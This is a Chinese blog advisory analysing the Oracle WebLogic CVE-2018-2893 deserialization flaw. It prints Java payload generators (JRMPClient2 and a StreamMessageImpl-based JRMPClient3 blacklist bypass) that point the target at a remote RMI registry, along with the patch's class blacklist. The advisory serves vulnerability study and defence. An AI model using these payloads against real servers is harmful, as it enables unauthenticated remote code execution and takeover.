道书简
道书简

CVE-2018-2893:Oracle WebLogic Server 远程代码执行漏洞分析预警

0x00 漏洞描述

  7月18日,Oracle官方发布了季度补丁更新,其中修复了一个 Oracle WebLogic Server 远程代码执行漏洞CVE-2018-2893,此漏洞是对编号为 CVE-2018-2628 修复的绕过,攻击者同样可以在未身份验证的情况下对WebLogic进行攻击。
目前相关PoC已经公开,建议相关用户尽快进行评估升级。

0x01 漏洞影响面

  影响版本:
  WebLogic 10.3.6.0 WebLogic 12.1.3.0 WebLogic 12.2.1.2 WebLogic 12.2.1.3

0x02 漏洞详情

  • 漏洞概况
      WebLogic Server使用T3协议在WebLogic Server和客户端间传输数据和通信,由于WebLogic的T3协议和Web协议使用相同的端口,导致在默认情况下,WebLogic Server T3协议通信和Web端具有相同的访问权限。 易受攻击的WebLogic服务允许未经身份验证的攻击者通过T3网络访问及破坏Oracle WebLogic Server。此漏洞的成功攻击可能导致攻击者接管Oracle WebLogic Server,造成远程代码执行。
  • CVE-2018-2628
      InboundMsgAbbrev 使用 resolveProxyClass 来处理 rmi 接口类型,但仅仅只是对java.rmi.registry.Registry 进行比较判断,可通过其他rmi接口构造绕过。
 protected Class resolveProxyClass(String[] interfaces) throws IOException, 
ClassNotFoundException
 { String[] arr$ = interfaces;
 int len$ = interfaces.length;

    for(int i$ = 0; i$ < len$; ++i$) {
        String intf = arr$[i$];
        if(intf.equals("java.rmi.registry.Registry")) {
            throw new InvalidObjectException("Unauthorized proxy deserialization");
        }
    }

    return super.resolveProxyClass(interfaces);
}

  在公开 PoC 中,通过序列化RemoteObjectInvocationHandler,利用UnicastRef建立TCP连接获取远端的RMI registry,加载后会进行readObject解析,通过反序列化漏洞造成远程代码执行。

 public class JRMPClient2 extends PayloadRunner implements ObjectPayload {

    public Activator getObject ( final String command ) throws Exception {

        String host;
        int port;
        int sep = command.indexOf(':');
        if ( sep < 0 ) {
            port = new Random().nextInt(65535);
            host = command;
        }
        else {
            host = command.substring(0, sep);
            port = Integer.valueOf(command.substring(sep + 1));
        }
        ObjID id = new ObjID(new Random().nextInt()); // RMI registry
        TCPEndpoint te = new TCPEndpoint(host, port);
        UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));
        RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref);
        Activator proxy = (Activator) Proxy.newProxyInstance(JRMPClient2.class.getClassLoader(), new Class[] {
            Activator.class
        }, obj);
        return proxy;
    }


    public static void main ( final String[] args ) throws Exception {
        Thread.currentThread().setContextClassLoader(JRMPClient2.class.getClassLoader());
        PayloadRunner.run(JRMPClient2.class, args);
    }
}

  补丁(p27395085_1036_Generic) ,在WeblogicFilterConfig.class 的黑名单中添加了sun.rmi.server.UnicastRef, 进行防御。

 private static final String[] DEFAULT_BLACKLIST_CLASSES = new String[]
{"org.codehaus.groovy.runtime.ConvertedClosure", "org.codehaus.groovy.runtime.ConversionHandler", 
"org.codehaus.groovy.runtime.MethodClosure", 
"org.springframework.transaction.support.AbstractPlatformTransactionManager", 
"sun.rmi.server.UnicastRef"};

补丁绕过

  WebLogic 内部类 weblogic.jms.common.StreamMessageImpl 可被序列化并且在反序列化时可以调用RMI的类,可以绕过WebLogic 的黑名单限制。

public class JRMPClient3 extends PayloadRunner implements ObjectPayload {

    public Object streamMessageImpl(byte[] object) {
        StreamMessageImpl streamMessage = new StreamMessageImpl();
        streamMessage.setDataBuffer(object, object.length);
        return streamMessage;
    }

    public Object getObject (final String command ) throws Exception {
        String host;
        int port;
        int sep = command.indexOf(':');
        if (sep < 0) {
            port = new Random().nextInt(65535);
            host = command;
        }
        else {
            host = command.substring(0, sep);
            port = Integer.valueOf(command.substring(sep + 1));
        }
        ObjID objID = new ObjID(new Random().nextInt()); // RMI registry
        TCPEndpoint tcpEndpoint = new TCPEndpoint(host, port);
        UnicastRef unicastRef = new UnicastRef(new LiveRef(objID, tcpEndpoint, false));
        RemoteObjectInvocationHandler remoteObjectInvocationHandler = new RemoteObjectInvocationHandler(unicastRef);
        Object object = Proxy.newProxyInstance(JRMPClient.class.getClassLoader(), new Class[] { Registry.class }, remoteObjectInvocationHandler);
        return streamMessageImpl(Serializer.serialize(object));
    }


    public static void main ( final String[] args ) throws Exception {
        Thread.currentThread().setContextClassLoader(JRMPClient3.class.getClassLoader());
        PayloadRunner.run(JRMPClient3.class, args);
    }
}

你可能感兴趣的:(CVE-2018-2893:Oracle WebLogic Server 远程代码执行漏洞分析预警)

  • 浅谈幂等设计 崩溃的章鱼哥 后端
    浅谈幂等设计最近笔者在做一个幂等方面的需求,把开发过程中的一些心得,分享给大家,主要是围绕着幂等的一些理念的辩证与思考,如有错误请指正!什么是幂等幂等性原本是一个数学领域的概念:对于函数f(x),若满足f(f(x))=f(x),则称该函数具有幂等性。在计算机领域,则指多次执行同一操作对系统状态的改变与仅执行一次是相同的。核心是对于系统资源状态的修改,不管执行一次还是执行多次,最终资源状态的终态是一
  • Ollama容器+打造DeepSeek-R1-7B大模型 码哝小鱼 AI大模型docker运维语言模型
    1、获取Ollama官方镜像1.1在线拉取镜像#dokcerpullollama/ollama:0.5.71.2导入离线镜像#tar-zxfollama0.5.7_x86.tar.gz#dokcerload-iollama0.5.7.tar2、执行以下命令创建与启动ollama#dockerrun-dp8880:11434--nameollama\-eOLLAMA_HOST=0.0.0.0:114
  • Python面试题:解释一下什么是 Python 的 GIL(全局解释器锁) 杰哥在此 Python系列python开发语言
    Python的GIL(GlobalInterpreterLock,全局解释器锁)是CPython解释器中的一个机制,它限制了在任何给定的时刻只有一个线程能够执行Python字节码。这意味着,即使在多核处理器上,Python程序也不能通过多线程实现真正的并行执行。GIL的背景GIL是由CPython解释器实现的,它是为了简化内存管理而引入的。Python中的对象管理(特别是引用计数)不是线程安全的,
  • List对象进行排序 Lin_Miao_09 java优秀例子listjava
    目录一、List对象中某个值进行排序代码示例注意事项二、List.sort和Collections.sort异同1.方法所属2.使用方式3.是否修改原列表4.泛型支持5.性能6.适用场景7.示例代码对比使用testList.sort使用Collections.sort8.总结三、为对象多个属性进行排序示例代码一、List对象中某个值进行排序用空间换时间,Java在内存中进行对象集合排序。在Java
  • qt 使用qss控制界面外观 yaofei2006 qt开发语言ui
    在Qt中,QSS(QtStyleSheets)是一种基于CSS(CascadingStyleSheets)的样式表语言,用于自定义Qt应用程序的外观。通过QSS,你可以轻松地修改控件的颜色、字体、边框、背景等属性,而无需修改代码。以下是使用QSS的详细指南:1.基本语法QSS的语法与CSS类似,由选择器和声明块组成:选择器{属性:值;属性:值;}示例QPushButton{background-c
  • 8.12 orm-聚合查询 yangshiting84 暑期规划djangopython后端
    8.12orm-聚合查询聚合查询(aggregate)聚合查询函数是对一组值执行计算,并返回单个值。Django使用聚合查询前要先从django.db.models引入Avg、Max、Min、Count、Sum(首字母大写)。fromdjango.db.modelsimportAvg,Max,Min,Count,Sum#引入函数聚合查询返回值的数据类型是字典。聚合函数aggregate()是Que
  • qt实现网络聊天室 yaofei2006 服务器qt
    1.功能需求服务器:监听客户端连接。接收客户端消息并广播给所有连接的客户端。处理客户端断开连接。客户端:连接到服务器。发送消息到服务器。接收并显示来自其他客户端的消息。2.技术栈Qt网络模块:QTcpServer和QTcpSocket用于实现网络通信。多线程:使用QThread或Qt的事件循环处理并发连接。信号与槽机制:用于处理网络事件和UI更新。QtWidgets:用于构建用户界面。3.项目结构
  • 前端为什么要使用new Promise包裹一个函数 没资格抱怨 JS核心前端javascript
    在前端开发中,使用newPromise包裹一个函数主要是为了将原本不支持Promise规范的操作转化为支持Promise规范的操作,从而可以更好地处理异步操作,提升代码的可读性和可维护性。下面详细介绍这么做的常见原因和应用场景:1.封装回调风格的异步操作在JavaScript中,早期的异步操作(如setTimeout、XMLHttpRequest等)通常使用回调函数来处理结果。这种方式容易导致回调
  • C语言结构体,枚举,联合,位断等自定义类型详解 myloveasuka C语言c语言数据结构开发语言
    目录结构体1.结构体声明2.结构体成员的访问3.结构体自引用4.结构体变量定义,初始化,传参5.结构体内存对齐位段1.什么是位段?2.位段的内存分配枚举1.枚举类型的定义2.枚举的使用3.枚举的优点联合(共同体)1.联合类型的定义2.联合的特点3.面试题:判断当前计算机的大小端存储4.联合大小的计算代码仓库结构体1.结构体声明1.1概念1.结构体是一些值的集合,这些值称为成员变量。2.结构体的每个
  • Java关键字static 我尽力学 java开发语言
    Java关键字static一、static是什么?static是Java中的关键字,用于修饰类成员(变量、方法、代码块、内部类)或实现静态导包。它的核心作用是让成员脱离对象依赖,直接通过类访问。好比班级里的公共黑板(static修饰的成员),所有学生(对象)共用同一块黑板;而每个学生的课桌(普通成员)则是各自独立的。二、static的五大用法1.静态变量:共享的“公共财产”特点:所有对象共享同一份
  • C++封装、继承、多态 PaQiuQiu C++《i+1》c++开发语言后端
    面向对象的三个基本特征面向对象的三个基本特征是:封装、继承、多态。其中,封装可以隐藏实现细节,使得代码模块化;继承可以扩展已存在的代码模块(类);它们的目的都是为了——代码重用。而多态则是为了实现另一个目的——接口重用!封装什么是封
  • Qt中多ui使用及简单布局实现交互界面 liangyunshan123 Qt开发技巧1024程序员节qtuic++
    系列文章目录第一章Qt中C++代码搭配UI文件实现交互界面第二章Qt中多ui使用及简单布局实现交互界面文章目录前言一、新增两个新UI文件二、使用这两个新增的UI及简单布局三.添加简单联动逻辑四.编译运行及动态效果展示总结前言前一段时间,写了一篇关于Qt中C++代码搭配UI文件实现简单的交互界面的文章,当时是计划作为一个系列来写的,希望交流一下循序渐进的学习和使用Qt心得。前几天评论中有人催更了,所
  • JavaScript系列(68)--运行时优化技术详解 ᅟᅠ        ‌‍‎‏ 一进制 JavaScriptjavascriptjava前端
    JavaScript运行时优化技术详解今天,让我们深入探讨JavaScript的运行时优化技术。运行时优化是提升JavaScript应用性能的另一个关键环节,它关注代码在实际执行过程中的性能表现。运行时优化基础概念小知识:JavaScript运行时优化是指在代码执行过程中,通过各种技术手段来提高代码的执行效率。这包括即时编译(JIT)、内联缓存、类型特化等技术。基本优化实现//1.函数执行优化器c
  • C++ 多态与 C# 的公有继承详解 雪域Code c++c#开发语言C#
    多态是面向对象编程中的一个重要概念,它能够实现在父类引用指向子类对象时的动态绑定,从而在运行时确定调用哪个子类对象的方法。C++和C#是两种流行的面向对象编程语言,在多态性和继承方面有一些共同之处,但也存在一些差异。本文将详细讨论C++中的多态和C#中的公有继承,并附带相应的源代码示例。首先,让我们来看一下C++中的多态性。在C++中,实现多态性通常需要通过虚函数和基类指针或引用来实现。虚函数是在
  • 介绍gruntwork模块服务和体系结构目录 weixin_26755331 pythonlinuxjava
    Today,I’mexcitedtorevealthenewdesignoftheGruntworkInfrastructureasCodeLibrary(IaCLibrary):今天,我很高兴地将Gruntwork基础结构的新设计作为代码库(IaC库)予以揭示:TheGruntworkModuleCatalogBuildyourinfrastructurebymixing&matchinghun
  • 解决方案之高效检测PDF文件中的XSS攻击问题
    引言随着互联网的普及和数字化办公的推进,PDF(PortableDocumentFormat)文件已成为信息交换的重要载体。然而,PDF文件的安全性问题也日益凸显,尤其是跨站脚本攻击(Cross-SiteScripting,XSS)的威胁。XSS攻击通过在PDF文件中嵌入恶意脚本,当用户打开文件时,脚本会在其浏览器中执行,可能导致敏感信息泄露、会话劫持等严重后果。因此,高效检测PDF文件中的XSS
  • 【kafka系列】broker 漫步者TZ kafka数据库分布式kafka
    目录Broker接收生产者消息和返回消息给消费者的流程逻辑分析Broker处理生产者消息的核心流程Broker处理消费者消息的核心流程关键点总结Broker接收生产者消息和返回消息给消费者的流程逻辑分析Broker处理生产者消息的核心流程接收请求Broker的SocketServer接收来自生产者的ProduceRequest(基于Reactor网络模型)。请求解析与验证解析请求头(Topic、P
  • 使用 Canal 实时从 MySql 向其它库同步数据 m0_74823239 面试学习路线阿里巴巴mysql数据库
    目前绝大多数项目还是采用mysql作为数据存储,对于用户访问量较高的网站来说,mysql读写性能有限,我们通常会把mysql中的数据实时同步到Redis、mongodb、elasticsearch等中间件中,应对高并发访问场景,减轻mysql压力,防止数据库宕机。在项目开发中,为了不会原有代码进行侵入,采用canal中间件实现mysql向其它库的实时同步,是一种很不错的方案。canal译意为水道/
  • 用js代码实现贪吃蛇小游戏 guai_guai_guai javascript前端开发语言
    js已经学了大部分了,现在就利用我所学的js知识试试做贪吃蛇小游戏吧以下部分相关图片以及思路笔记均出自渡一陈老师的视频首先制作简单的静态页面,添加贪吃蛇移动的背景和相关图片,比如开始游戏等等将各个功能均封装在函数中,利用主函数调用分函数会使结构更清晰初始化游戏初始化地图地图坐标//1.初始化地图for(leti=0;i=td||newHead.y=tr){collideCheckInfo.isCo
  • Python自学攻略:AI时代的高效学习法 —— 如何用大模型快速上手编程 优化小秦 人工智能
    在AI技术爆发的今天,学习Python已不再是传统的“看书+敲代码”模式。借助大语言模型(如Deepseek、GPT、Claude、Kimi、豆包等),学习效率可以提升数倍。本文将结合实操路径、工具链和避坑指南,为你提供一套AI时代的Python速成方案。一、为什么AI能让Python学习效率飙升?实时纠错与解释传统学习:遇到报错需反复查资料,耗时且挫败感强AI辅助:直接将错误信息丢给大模型,1秒
  • PHP 流程控制与错误处理 来恩1003 PHP从入门到精通phpandroid开发语言
    PHP学习资料PHP学习资料PHP学习资料在PHP编程中,流程控制语句用于控制程序的执行顺序,而错误处理和异常处理机制则确保程序在遇到问题时能够稳定运行,并提供有意义的反馈。以下将详细介绍PHP中的条件语句、循环语句的使用,以及错误处理和异常处理机制。一、条件语句1.if-else语句if-else语句是最基本的条件判断结构,用于根据条件的真假来执行不同的代码块。$age=20;if($age>=
  • [HarmonyOS Next示例代码]水印添加能力 HarmonyOS Coder369 HarmonyOSNext鸿蒙开发harmonyos华为鸿蒙数码相机音视频
    HarmonyOSnext示例代码全集Watermark:本示例为开发者展示常用的水印添加能力,包括两种方式给页面背景添加水印、保存图片添加水印、拍照图片添加水印。水印添加能力介绍本示例为开发者展示常用的水印添加能力,包括两种方式给页面背景添加水印、保存图片添加水印、拍照图片添加水印。效果预览工程目录├──entry/src/main/ets/│├──component││└──NavBar.et
  • 如何使用 Python 调用 DLL 文件 程序员杨弋 Python全栈工程师学习指南python开发语言
    在最近的Python开发中,许多开发人员涉及到了与DLL文件的交互。DLL(动态链接库)文件是包含可由其他程序调用的代码和数据的文件。Python既支持使用C++和C编写DLL,也可以使用ctypes模块轻松地调用它们。本文将向您展示如何使用Python调用DLL文件。一、何为DLLDLL文件是由C++、C或其他编译器编译生成,以包含可由其他程序调用的代码和数据的文件。它们通常包含API(应用程序
  • Netty UDP 客户端发消息后接收服务器信息 一顿敲代码的小朋 nettyjava
    在本站大神的文章的基础上,加入了我的项目需求,当客户端用UDP给服务端发送消息后,接收到服务端返回的消息再关闭客户端。UdpServer.javaimportio.netty.bootstrap.Bootstrap;importio.netty.channel.ChannelOption;importio.netty.channel.EventLoopGroup;importio.netty.ch
  • 【HarmonyOS NEXT】示例代码-水印添加能力 这货就是木子全呀 HarmonyOS示例代码harmonyos
    介绍本示例为开发者展示常用的水印添加能力,包括两种方式给页面背景添加水印、保存图片添加水印、拍照图片添加水印。效果预览工程目录解释├──entry/src/main/ets/│├──component││└──NavBar.ets          //顶部导航条│├──constants││├──Utils.ets          //工具类││└──Constants.ets        
  • 「前端+鸿蒙」鸿蒙应用开发-TS-模块化 吴维炜 大前端开发前端鸿蒙harmonyos华为typescript
    在TypeScript中,模块化是一种将代码分割成独立单元的方式,每个单元可以封装特定的功能或数据。模块化有助于保持代码的组织性、可维护性和可重用性。TypeScript支持ES6模块标准,这意味着你可以使用import和export语句来创建模块。TS快速入门-模块化导出模块成员使用export关键字可以将类、接口、类型、函数或变量导出,以便它们可以在其他文件中被导入。//myModule.ts
  • 一种MCU设备框架设计与实现 jiuri_1215 MCU开发单片机嵌入式硬件设备框架
    引言在嵌入式系统开发中,一个良好的设备驱动框架可以大大提高代码的可维护性和可移植性。本文将介绍一个轻量级的MCU设备框架实现,该框架采用面向对象的思想,通过抽象设备接口,实现了设备管理的统一化和标准化。框架设计1.核心思想统一设备操作接口支持动态设备注册/注销链表管理多个设备面向对象的设计理念2.关键数据结构首先在头文件device_framework.h中定义核心数据结构:structdevic
  • 《Python与C#:虚拟机与元宇宙的次元战争》 虫洞没有虫 科技资讯\好文分享c#开发语言
    一、运行时拓扑的「克莱因瓶」C#的CLR是三维环面结构的完美体现,IL代码在JIT编译时经历时空折叠。Unity引擎中,值类型在栈内存构建莫比乌斯环,使得800万顶点模型渲染保持16ms的帧同步。但当尝试将ECS架构推至理论极限时,发现GC的标记-清除算法会破坏拓扑结构,必须切换到UnityDOTS的Burst编译器实现量子退火优化。Python的PyPy则是四维超球面,JIT编译器在跟踪热点时创
  • C# ASP.NET的应用场景 来恩1003 C#从入门到精通c#asp.net数据库
    .NET学习资料.NET学习资料.NET学习资料C#ASP.NET作为一种强大的Web开发框架,在众多领域都有着广泛的应用,为各类Web应用的开发提供了高效、可靠的解决方案。以下是其主要的应用场景:企业级Web应用在企业级应用开发中,C#ASP.NET凭借其卓越的性能和强大的功能,成为众多企业的首选。它能够与企业现有的系统和数据库进行无缝集成,例如与MicrosoftSQLServer数据库紧密结
  • 前端框架Vue内容回顾 GISer_Jinger JavascriptVue前端框架vue.js前端
    前端面试Vue必备内容详解如果你正在准备Vue相关的前端面试,这份详细指南将帮助你掌握Vue核心知识,助你高效备战面试。1.Vue基础知识1.1Vue的核心概念声明式渲染:Vue采用数据驱动视图的方式,通过{{}}语法或v-bind绑定数据,无需手动操作DOM。组件化开发:Vue提供了单文件组件(SFC),支持HTML、CSS、JS组合在.vue文件中,提高代码复用性和可维护性。数据驱动:Vue采
  • Java序列化进阶篇 g21121 java序列化
            1.transient         类一旦实现了Serializable 接口即被声明为可序列化,然而某些情况下并不是所有的属性都需要序列化,想要人为的去阻止这些属性被序列化,就需要用到transient 关键字。
  • escape()、encodeURI()、encodeURIComponent()区别详解 aigo JavaScriptWeb
    原文:http://blog.sina.com.cn/s/blog_4586764e0101khi0.html   JavaScript中有三个可以对字符串编码的函数,分别是: escape,encodeURI,encodeURIComponent,相应3个解码函数:,decodeURI,decodeURIComponent 。 下面简单介绍一下它们的区别 1 escape()函
  • ArcgisEngine实现对地图的放大、缩小和平移 Cb123456 添加矢量数据对地图的放大、缩小和平移Engine
    ArcgisEngine实现对地图的放大、缩小和平移:  个人觉得是平移,不过网上的都是漫游,通俗的说就是把一个地图对象从一边拉到另一边而已。就看人说话吧.  具体实现: 一、引入命名空间    using ESRI.ArcGIS.Geometry;    using ESRI.ArcGIS.Controls; 二、代码实现.
  • Java集合框架概述 天子之骄 Java集合框架概述
       集合框架 集合框架可以理解为一个容器,该容器主要指映射(map)、集合(set)、数组(array)和列表(list)等抽象数据结构。 从本质上来说,Java集合框架的主要组成是用来操作对象的接口。不同接口描述不同的数据类型。   简单介绍:   Collection接口是最基本的接口,它定义了List和Set,List又定义了LinkLi
  • 旗正4.0页面跳转传值问题 何必如此 javajsp
    跳转和成功提示 a)        成功字段非空forward 成功字段非空forward,不会弹出成功字段,为jsp转发,页面能超链接传值,传输变量时需要拼接。接拼接方式list.jsp?test="+strweightUnit+"或list.jsp?test="+weightUnit+&qu
  • 全网唯一:移动互联网服务器端开发课程 cocos2d-x小菜 web开发移动开发移动端开发移动互联程序员
        移动互联网时代来了!     App市场爆发式增长为Web开发程序员带来新一轮机遇,近两年新增创业者,几乎全部选择了移动互联网项目!传统互联网企业中超过98%的门户网站已经或者正在从单一的网站入口转向PC、手机、Pad、智能电视等多端全平台兼容体系。据统计,AppStore中超过85%的App项目都选择了PHP作为后端程
  • Log4J通用配置|注意问题 笔记 7454103 DAOapachetomcatlog4jWeb
    关于日志的等级 那些去 百度就知道了! 这几天 要搭个新框架  配置了 日志 记下来 !做个备忘! #这里定义能显示到的最低级别,若定义到INFO级别,则看不到DEBUG级别的信息了~! log4j.rootLogger=INFO,allLog # DAO层 log记录到dao.log 控制台 和 总日志文件 log4j.logger.DAO=INFO,dao,C
  • SQLServer TCP/IP 连接失败问题 ---SQL Server Configuration Manager darkranger sqlcwindowsSQL ServerXP
    当你安装完之后,连接数据库的时候可能会发现你的TCP/IP 没有启动.. 发现需要启动客户端协议 : TCP/IP  需要打开 SQL Server Configuration Manager... 却发现无法打开 SQL Server Configuration Manager..?? 解决方法:  C:\WINDOWS\system32目录搜索framedyn.
  • [置顶] 做有中国特色的程序员 aijuans 程序员
    从出版业说起 网络作品排到靠前的,都不会太难看,一般人不爱看某部作品也是因为不喜欢这个类型,而此人也不会全不喜欢这些网络作品。究其原因,是因为网络作品都是让人先白看的,看的好了才出了头。而纸质作品就不一定了,排行榜靠前的,有好作品,也有垃圾。 许多大牛都是写了博客,后来出了书。这些书也都不次,可能有人让为不好,是因为技术书不像小说,小说在读故事,技术书是在学知识或温习知识,有些技术书读得可
  • document.domain 跨域问题 avords document
    document.domain用来得到当前网页的域名。比如在地址栏里输入:javascript:alert(document.domain); //www.315ta.com我们也可以给document.domain属性赋值,不过是有限制的,你只能赋成当前的域名或者基础域名。比如:javascript:alert(document.domain = "315ta.com");
  • 关于管理软件的一些思考 houxinyou 管理
    工作好多看年了,一直在做管理软件,不知道是我最开始做的时候产生了一些惯性的思维,还是现在接触的管理软件水平有所下降.换过好多年公司,越来越感觉现在的管理软件做的越来越乱. 在我看来,管理软件不论是以前的结构化编程,还是现在的面向对象编程,不管是CS模式,还是BS模式.模块的划分是很重要的.当然,模块的划分有很多种方式.我只是以我自己的划分方式来说一下. 做为管理软件,就像现在讲究MVC这
  • NoSQL数据库之Redis数据库管理(String类型和hash类型) bijian1013 redis数据库NoSQL
    一.Redis的数据类型 1.String类型及操作         String是最简单的类型,一个key对应一个value,string类型是二进制安全的。Redis的string可以包含任何数据,比如jpg图片或者序列化的对象。         Set方法:设置key对应的值为string类型的value
  • Tomcat 一些技巧 征客丶 javatomcatdos
    以下操作都是在windows 环境下 一、Tomcat 启动时配置 JAVA_HOME 在 tomcat 安装目录,bin 文件夹下的 catalina.bat 或 setclasspath.bat 中添加 set JAVA_HOME=JAVA 安装目录 set JRE_HOME=JAVA 安装目录/jre 即可; 二、查看Tomcat 版本 在 tomcat 安装目
  • 【Spark七十二】Spark的日志配置 bit1129 spark
    在测试Spark Streaming时,大量的日志显示到控制台,影响了Spark Streaming程序代码的输出结果的查看(代码中通过println将输出打印到控制台上),可以通过修改Spark的日志配置的方式,不让Spark Streaming把它的日志显示在console   在Spark的conf目录下,把log4j.properties.template修改为log4j.p
  • Haskell版冒泡排序 bookjovi 冒泡排序haskell
    面试的时候问的比较多的算法题要么是binary search,要么是冒泡排序,真的不想用写C写冒泡排序了,贴上个Haskell版的,思维简单,代码简单,下次谁要是再要我用C写冒泡排序,直接上个haskell版的,让他自己去理解吧。     sort [] = [] sort [x] = [x] sort (x:x1:xs) | x>x1 = x1:so
  • java 路径 配置文件读取 bro_feng java
    这几天做一个项目,关于路径做如下笔记,有需要供参考。 取工程内的文件,一般都要用相对路径,这个自然不用多说。 在src统计目录建配置文件目录res,在res中放入配置文件。 读取文件使用方式: 1. MyTest.class.getResourceAsStream("/res/xx.properties") 2. properties.load(MyTest.
  • 读《研磨设计模式》-代码笔记-简单工厂模式 bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ package design.pattern; /* * 个人理解:简单工厂模式就是IOC; * 客户端要用到某一对象,本来是由客户创建的,现在改成由工厂创建,客户直接取就好了 */ interface IProduct {
  • SVN与JIRA的关联 chenyu19891124 SVN
    SVN与JIRA的关联一直都没能装成功,今天凝聚心思花了一天时间整合好了。下面是自己整理的步骤: 一、搭建好SVN环境,尤其是要把SVN的服务注册成系统服务 二、装好JIRA,自己用是jira-4.3.4破解版 三、下载SVN与JIRA的插件并解压,然后拷贝插件包下lib包里的三个jar,放到Atlassian\JIRA 4.3.4\atlassian-jira\WEB-INF\lib下,再
  • JWFDv0.96 最新设计思路 comsci 数据结构算法工作企业应用公告
                       随着工作流技术的发展,工作流产品的应用范围也不断的在扩展,开始进入了像金融行业(我已经看到国有四大商业银行的工作流产品招标公告了),实时生产控制和其它比较重要的工程领域,而
  • vi 保存复制内容格式粘贴 daizj vi粘贴复制保存原格式不变形
        vi是linux中非常好用的文本编辑工具,功能强大无比,但对于复制带有缩进格式的内容时,粘贴的时候内容错位很严重,不会按照复制时的格式排版,vi能不能在粘贴时,按复制进的格式进行粘贴呢? 答案是肯定的,vi有一个很强大的命令可以实现此功能 。     在命令模式输入:set paste,则进入paste模式,这样再进行粘贴时
  • shell脚本运行时报错误:/bin/bash^M: bad interpreter 的解决办法 dongwei_6688 shell脚本
    出现原因:windows上写的脚本,直接拷贝到linux系统上运行由于格式不兼容导致 解决办法: 1. 比如文件名为myshell.sh,vim myshell.sh 2. 执行vim中的命令 : set ff?查看文件格式,如果显示fileformat=dos,证明文件格式有问题 3. 执行vim中的命令 :set fileformat=unix 将文件格式改过来就可以了,然后:w
  • 高一上学期难记忆单词 dcj3sjt126com wordenglish
    honest 诚实的;正直的 argue 争论 classical 古典的 hammer 锤子 share  分享;共有 sorrow 悲哀;悲痛 adventure 冒险 error 错误;差错 closet 壁橱;储藏室 pronounce 发音;宣告 repeat 重做;重复 majority 大多数;大半   native 本国的,本地的,本国
  • hibernate查询返回DTO对象,DTO封装了多个pojo对象的属性 frankco POJOhibernate查询DTO
          DTO-数据传输对象;pojo-最纯粹的java对象与数据库中的表一一对应。       简单讲:DTO起到业务数据的传递作用,pojo则与持久层数据库打交道。         有时候我们需要查询返回DTO对象,因为DTO
  • Partition List hcx2013 partition
    Given a linked list and a value x, partition it such that all nodes less than x come before nodes greater than or equal to x. You should preserve the original relative order of th
  • Spring MVC测试框架详解——客户端测试 jinnianshilongnian
    上一篇《Spring MVC测试框架详解——服务端测试》已经介绍了服务端测试,接下来再看看如果测试Rest客户端,对于客户端测试以前经常使用的方法是启动一个内嵌的jetty/tomcat容器,然后发送真实的请求到相应的控制器;这种方式的缺点就是速度慢;自Spring 3.2开始提供了对RestTemplate的模拟服务器测试方式,也就是说使用RestTemplate测试时无须启动服务器,而是模拟一
  • 关于推荐个人观点 liyonghui160com 推荐系统关于推荐个人观点
        回想起来,我也做推荐了3年多了,最近公司做了调整招聘了很多算法工程师,以为需要多么高大上的算法才能搭建起来的,从实践中走过来,我只想说【不是这样的】     第一次接触推荐系统是在四年前入职的时候,那时候,机器学习和大数据都是没有的概念,什么大数据处理开源软件根本不存在,我们用多台计算机web程序记录用户行为,用.net的w
  • 不间断旋转的动画 pangyulei 动画
    CABasicAnimation* rotationAnimation; rotationAnimation = [CABasicAnimation animationWithKeyPath:@"transform.rotation.z"]; rotationAnimation.toValue = [NSNumber numberWithFloat: M
  • 自定义annotation sha1064616837 javaenumannotationreflect
    对象有的属性在页面上可编辑,有的属性在页面只可读,以前都是我们在页面上写死的,时间一久有时候会混乱,此处通过自定义annotation在类属性中定义。越来越发现Java的Annotation真心很强大,可以帮我们省去很多代码,让代码看上去简洁。 下面这个例子 主要用到了 1.自定义annotation:@interface,以及几个配合着自定义注解使用的几个注解 2.简单的反射 3.枚举
  • Spring 源码 up2pu spring
    1.Spring源代码 https://github.com/SpringSource/spring-framework/branches/3.2.x 注:兼容svn检出 2.运行脚本 import-into-eclipse.bat 注:需要设置JAVA_HOME为jdk 1.7 build.gradle compileJava { sourceCompatibilit
  • 利用word分词来计算文本相似度 yangshangchuan wordword分词文本相似度余弦相似度简单共有词
    word分词提供了多种文本相似度计算方式: 方式一:余弦相似度,通过计算两个向量的夹角余弦值来评估他们的相似度 实现类:org.apdplat.word.analysis.CosineTextSimilarity 用法如下: String text1 = "我爱购物"; String text2 = "我爱读书"; String text3 =
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他